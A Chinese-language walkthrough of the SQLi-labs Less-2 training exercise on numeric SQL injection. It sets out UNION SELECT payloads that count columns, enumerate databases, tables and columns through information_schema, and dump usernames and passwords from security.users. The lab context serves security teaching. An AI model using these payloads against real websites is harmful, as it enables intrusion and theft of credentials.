当前位置: 首页 > news >正文

less-2-数值型注入

判断注入点、注入类型--尝试注入--获取数据库--获取表--获取字段--获取数据库内容

1、判断注入点、注入类型

输入id=1 正常查询回显,输入一下sql代码

?id=1' --+ 和 ?id=1" --+

后报错说明没有 ' 和 "闭合,判断是数值型注入。

2、尝试注入

既然不是' 和 " ,我们猜测是数值型注入我们直接输入order by <number> 测试回显

输入一下sql代码

?id=1 order by 3

回显正常

再输入

?id=1 order by 4

后报错说明3个字段是查询的极限字段。

注:数值型不需要在后面输入#、--+来注释。

输入一下代码测试是否是3个字段

注:要制造一个为假的代码让后面的union语句执行。

?id=-1 union select 1,2,3

3、获取数据库

知道查询字段为3个,可显示的字段为2,3;我们利用万能公式获取数据库名字,我目前知道的有两条命令(其实就是前面的less-1的)

第一条

利用MySQL自带的数据库

?id=-1 union select 1,2,group_concat(schema_name) from information_schema.schemata

第二条

通过database()函数

?id=-1 union select 1,2,database() from information_schema.schemata

4、获取表

排除MySQL自带的数据库,可以知道challenges,security是用户自己创建的

我们直接查询security库

?id=-1 union select 1,2,group_concat(table_name) from information_schema.tables where table_schema='security'

5、获取字段

知道了目标的数据库还有表名,我们直接通过数据库和表名查询它们的字段

注:下面的sql注入语句通过数据库和表,利用MySQL的information_schema数据库来获取到相应的内容。

?id=-1 union select 1,2,group_concat(column_name) from information_schema.columns where table_schema='security' and table_name='users'

6、获取数据库内容

知道了库、表、字段,我们就可以直接查询了

输入一下sql代码

?id=-1 union select 1,group_concat(username),group_concat(password) from security.users

其他的表查询方法跟上面的一样。

http://www.jsqmd.com/news/719791/

相关文章:

  • UVM仿真总在奇怪的地方卡住?手把手教你用Objection机制精准控制Phase结束
  • 无需编程的智能图表设计革命:Charticulator完全指南
  • 2026年正版音乐素材平台对比:视频配乐、商用授权和音效下载怎么搭配 - Fzzf_23
  • OpenColorIO-Config-ACES:专业色彩管理的终极开源解决方案
  • 为什么你的车载C#中控总在高速行驶时断连?揭秘CAN总线抖动与.NET GC暂停的致命耦合(附实时GC调优清单)
  • LK1802 国兴顺 双路驱动芯片 两路达林顿晶体管阵列
  • 滚动分页列表(列表滚动到容器底部时,判断如果有数据则加载分页数据)
  • 2026最新彩箱印刷企业推荐!云南优质服务商权威榜单发布,实力靠谱昆明印刷厂家放心选 - 十大品牌榜
  • 2026年体验下来,这家医院的氛围让我改变了之前的看法
  • 砥砺三十 笃行百年|广州蒙娜丽莎卫浴三十周年盛典圆满礼成 - 资讯焦点
  • 别再死记硬背了!用银行1104报表和反洗钱报送,手把手教你搞懂数仓分层与ETL实战
  • CSS如何定义颜色的不透明度_使用HSL色彩空间的alpha通道
  • 扩散大语言模型内存优化:Mosaic系统突破与实践
  • ECS系统调度失衡,Burst不生效,Chunk布局碎片化——DOTS 2.0三大性能暗礁,及工业级绕行方案,仅限首批内测团队验证
  • 2026年上岸村公考老师推荐指南:分科名师实用推荐清单 - 资讯焦点
  • SteamShutdown智能关机完整指南:告别游戏下载后的能源浪费
  • 成都金茂晓棠售楼处-东城金茂锦棠金茂晓棠一二三期官网-楼盘百科 - 资讯焦点
  • 华润万家卡回收折扣与2026年操作步骤详解 - 京回收小程序
  • Linux 多线程编程完全指南(上):线程创建、退出与同步
  • 告别Altova XMLSpy,用VSCode插件高效编写EtherCAT从站ESI文件(附配置模板)
  • 大文件上传卡顿、OOM崩溃、超时失败,PHP 8.9分块处理到底缺哪一环?
  • 避坑指南:FPGA读写SPI Flash(S25FL系列)时,为什么你的擦除和写入总失败?
  • 2026年全国消防排烟风机与工业通风源头厂家完全采购指南 - 优质企业观察收录
  • Int J Surg(IF=10.1)南方医科大学珠江医院放射科全显跃等团队:CT在线计算器预测肝细胞癌术后预后及PA-TACE获益:开发与验证
  • 2026最新保密印刷企业厂家推荐!云南权威榜单发布,质效双优昆明印刷制造商推荐 - 十大品牌榜
  • 脸黄长斑不用慌,无极秀美白淡斑面霜温和补水提亮焕白肌肤 - 资讯焦点
  • caj2pdf终极指南:将CAJ文献转换为可编辑PDF的完整教程
  • RTX 4090D 24G镜像效果展示:CogVideoX视频生成模型长时序连贯性实测
  • 2026 AI文献代查工具权威评测|6 款工具实测,这款AI专题文献代查成为科研必备 - 逢君学术-AI论文写作
  • 2026最新书刊印刷企业推荐!云南优质印刷服务商榜单发布,实力靠谱昆明印刷供应商首选 - 十大品牌榜